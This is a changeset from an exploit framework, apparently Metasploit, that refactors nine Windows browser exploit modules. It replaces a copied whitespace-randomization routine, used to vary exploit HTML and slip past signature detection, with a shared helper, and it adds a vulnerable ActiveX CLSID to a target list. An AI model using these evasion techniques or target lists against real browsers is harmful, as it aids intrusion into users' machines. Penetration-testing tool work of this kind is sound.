Changeset 5496
- Timestamp:
- 04/25/08 00:29:29 (3 weeks ago)
- Files:
-
- framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ie_createobject.rb (modified) (4 diffs)
- framework3/trunk/modules/exploits/windows/browser/ie_iscomponentinstalled.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/kazaa_altnet_heap.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_013_createtextrange.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_055_vml_method.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_057_webview_setslice.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb (modified) (1 diff)
- framework3/trunk/modules/exploits/windows/browser/novelliprint_executerequest.rb (modified) (1 diff)
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
r4996 r5496 147 147 # 148 148 149 print_status("Attempting to exploit ani_loadimage_chunksize") 149 150 browser = '' 150 151 framework3/trunk/modules/exploits/windows/browser/ie_createobject.rb
r4645 r5496 49 49 50 50 # Patched 51 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], 51 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], 52 # Found in mpack 53 [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], 52 54 53 55 # Patched … … 59 61 60 62 # Visual Studio components, not marked as safe 61 [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],62 [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],63 [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],64 [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],65 [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],63 [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], 64 [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], 65 [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], 66 [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], 67 [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], 66 68 67 69 # … … 70 72 71 73 # Not marked as safe 72 [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],74 [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], 73 75 74 76 # Not marked as safe 75 [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],77 [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], 76 78 77 79 # Found exploitable in the wild (no details) 78 [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],80 [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], 79 81 80 82 ], … … 219 221 220 222 221 # Randomize the whitespace in the document 222 content.gsub!(/\s+/) do |s| 223 len = rand(100)+2 224 set = "\x09\x20\x0d\x0a" 225 buf = '' 226 227 while (buf.length < len) 228 buf << set[rand(set.length)].chr 229 end 230 231 buf 232 end 233 223 content = Rex::Text.randomize_space(content) 234 224 235 225 print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ie_iscomponentinstalled.rb
r4645 r5496 87 87 | 88 88 89 # Randomize the whitespace in the document 90 content.gsub!(/\s+/) do |s| 91 len = rand(100)+2 92 set = "\x09\x20\x0d\x0a" 93 buf = '' 94 95 while (buf.length < len) 96 buf << set[rand(set.length)].chr 97 end 98 99 buf 100 end 101 89 content = Rex::Text.randomize_space(content) 90 102 91 # Insert the shellcode 103 92 content.gsub!('__pattern__', pattern) framework3/trunk/modules/exploits/windows/browser/kazaa_altnet_heap.rb
r5482 r5496 103 103 "</html>" 104 104 105 # Randomize the whitespace in the document 106 content.gsub!(/\s+/) do |s| 107 len = rand(100)+2 108 set = "\x09\x20\x0d\x0a" 109 buf = '' 110 111 while (buf.length < len) 112 buf << set[rand(set.length)].chr 113 end 114 buf 115 116 end 105 content = Rex::Text.randomize_space(content) 117 106 118 107 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_013_createtextrange.rb
r4645 r5496 155 155 | 156 156 157 # Randomize the whitespace in the document 158 content.gsub!(/\s+/) do |s| 159 len = rand(100)+2 160 set = "\x09\x20\x0d\x0a" 161 buf = '' 162 163 while (buf.length < len) 164 buf << set[rand(set.length)].chr 165 end 166 167 buf 168 end 157 content = Rex::Text.randomize_space(content) 169 158 170 159 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_055_vml_method.rb
r4645 r5496 123 123 | 124 124 125 # Randomize the whitespace in the document 126 content.gsub!(/\s+/) do |s| 127 len = rand(100)+2 128 set = "\x09\x20\x0d\x0a" 129 buf = '' 130 131 while (buf.length < len) 132 buf << set[rand(set.length)].chr 133 end 134 135 buf 136 end 137 125 content = Rex::Text.randomize_space(content) 138 126 139 127 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/ms06_057_webview_setslice.rb
r4645 r5496 114 114 | 115 115 116 # Randomize the whitespace in the document 117 content.gsub!(/\s+/) do |s| 118 len = rand(100)+2 119 set = "\x09\x20\x0d\x0a" 120 buf = '' 121 122 while (buf.length < len) 123 buf << set[rand(set.length)].chr 124 end 125 126 buf 127 end 128 116 content = Rex::Text.randomize_space(content) 117 129 118 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") 130 119 framework3/trunk/modules/exploits/windows/browser/ms06_071_xml_core.rb
r5183 r5496 128 128 | 129 129 130 # Randomize the whitespace in the document 131 content.gsub!(/\s+/) do |s| 132 len = rand(100)+2 133 set = "\x09\x20\x0d\x0a" 134 buf = '' 135 136 while (buf.length < len) 137 buf << set[rand(set.length)].chr 138 end 139 140 buf 141 end 130 content = Rex::Text.randomize_space(content) 142 131 143 132 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") framework3/trunk/modules/exploits/windows/browser/novelliprint_executerequest.rb
r5482 r5496 106 106 | 107 107 108 # Randomize the whitespace in the document 109 content.gsub!(/\s+/) do |s| 110 len = rand(100)+2 111 set = "\x09\x20\x0d\x0a" 112 buf = '' 108 content = Rex::Text.randomize_space(content) 113 109 114 while (buf.length < len)115 buf << set[rand(set.length)].chr116 end117 buf118 end119 120 110 print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") 121 111
